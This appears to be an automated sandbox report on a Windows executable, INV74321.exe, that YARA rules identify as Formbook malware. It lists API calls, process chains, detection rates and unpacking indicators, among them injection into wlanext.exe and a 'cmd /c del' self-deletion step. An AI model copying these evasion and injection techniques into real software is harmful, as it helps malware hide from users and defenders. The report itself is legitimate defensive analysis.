          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B197A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B198A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19820 NtEnumerateKey
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B1B040 NtSuspendThread
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B199D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19950 NtQueueApcThread
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19A10 NtQuerySection
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B1A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19B00 NtSetValueKey
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B195F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B1AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19560 NtWriteFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B196D0 NtCreateKey
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19650 NtQueryValueKey
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B1A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19770 NtSetInformationFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B1A770 NtOpenThread
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B19760 NtOpenProcess
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_004181C0 NtCreateFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_00418270 NtReadFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_004182F0 NtClose
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_004183A0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_004181BA NtCreateFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_0041826C NtReadFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_004182EA NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037899A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037896E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037896D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037895D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0378A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789A20 NtResumeThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789A10 NtQuerySection
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037899D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0378B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037898F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037898A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0378A770 NtOpenThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789760 NtOpenProcess
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0378A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037897A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789560 NtWriteFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0378AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03789520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037895F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C83A0 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C8270 NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C82F0 NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C81C0 NtCreateFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C826C NtReadFile
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C82EA NtClose
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030C81BA NtCreateFile
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_00403348 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_00406945
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_0040711C
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00408C60
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_0041C538
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00402D89
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_0041C7A0
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B020A0
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA20A8
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AEB090
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B91002
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AF4120
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00ADF900
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA22AE
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B0EBB0
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B9DBD2
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA2B28
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AE841F
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00B02581
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AED5E0
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA25DD
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AD0D20
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA2D07
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA1D55
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA2EF7
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00AF6E30
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_2_00BA1FF1
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_00408C5B
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 1_1_00408C60
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0380DBD2
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03812B28
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0377EBB0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_038122AE
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03764120
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0374F900
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_038120A8
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_038128EC
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03801002
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0381E824
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_037720A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0375B090
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0381DFCE
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03811FF1
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03766E30
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03812EF7
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0380D616
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03740D20
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_038125DD
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03812D07
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0375D5E0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03811D55
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_03772581
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0375841F
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_0380D466
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030CC7A0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030B2FB0
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030CC538
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030B2D89
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030B2D90
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030B8C5B
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: 8_2_030B8C60
          Source: C:\Windows\SysWOW64\wlanext.exe, Code function: String function: 0374B150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: String function: 0041A0A0 appears 38 times
          Source: INV74321.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: INV74321.exe, 00000000.00000003.208336740.0000000002C7F000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000000.00000002.221214353.0000000000A70000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257734527.0000000000D5F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs INV74321.exe
          Source: INV74321.exe, 00000001.00000002.257457719.0000000000A62000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamewlanext.exej% vs INV74321.exe
          Source: INV74321.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/3@16/7
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_00403348 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoA, GetCommandLineA, CharNextA, GetTempPathA, GetTempPathA, GetWindowsDirectoryA, lstrcatA, GetTempPathA, lstrcatA, SetEnvironmentVariableA, SetEnvironmentVariableA, SetEnvironmentVariableA, DeleteFileA, OleUninitialize, ExitProcess, lstrcatA, lstrcatA, lstrcatA, lstrcmpiA, SetCurrentDirectoryA, DeleteFileA, CopyFileA, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_0040460D GetDlgItem, SetWindowTextA, SHBrowseForFolderA, CoTaskMemFree, lstrcmpiA, lstrcatA, SetDlgItemTextA, GetDiskFreeSpaceA, MulDiv, SetDlgItemTextA
          Source: C:\Users\user\Desktop\INV74321.exe, Code function: 0_2_0040216B CoCreateInstance, MultiByteToWideChar
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_01
          Source: C:\Users\user\Desktop\INV74321.exe, File created: C:\Users\user\AppData\Local\Temp\nso60E4.tmp
          Source: INV74321.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\INV74321.exe, File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\INV74321.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: INV74321.exe, Virustotal: Detection: 30%
          Source: INV74321.exe, Metadefender: Detection: 14%
          Source: INV74321.exe, ReversingLabs: Detection: 72%
          Source: C:\Users\user\Desktop\INV74321.exe, File read: C:\Users\user\Desktop\INV74321.exe
          Source: unknown, Process created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exe, Process created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exe, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\INV74321.exeProcess created: C:\Users\user\Desktop\INV74321.exe 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INV74321.exe'
          Source: C:\Users\user\Desktop\INV74321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\INV74321.exe | Unpacked PE file: 1.2.INV74321.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0040102D pushfd ; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_004160CD push 00000033h; iretd
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_004161E9 push es; retf
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041624E push es; retf
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\INV74321.exe | Code function: 1_2_0041B40B push eax; ret
